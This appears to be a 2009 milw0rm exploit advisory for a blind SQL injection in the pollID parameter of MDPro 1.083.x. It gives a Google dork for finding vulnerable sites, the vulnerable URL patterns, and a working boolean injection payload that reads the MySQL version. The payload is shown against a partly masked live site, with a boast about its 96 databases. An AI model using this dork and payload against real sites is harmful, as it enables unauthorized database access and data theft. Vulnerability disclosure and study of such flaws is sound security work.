[!]Information_schema: [Product: MDPro v 1.083.x ] [site: www.maxdev.com ] [Vuln: Blind $QL Injection (pollID) ] [Author: XaDoS ~ thanks to S3rg3770 ] [dork: inurl:modules.php?op= "pollID"] [ "Powered By MDPro" ] [~] Vuln: (PollID) http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL] or http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL] [~] DeMo: For example, if yuo want see the version of MySql write: http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5# Like: http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work] so v => 5.0.0 (this site have 96 databases) :) [~] Note: If yuo want exploit for this vuln write it by yuorself. I'm really Busy. thanks to s3rg3770 and warwolfz Crew \*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire Have Fun :D # milw0rm.com [2009-06-25]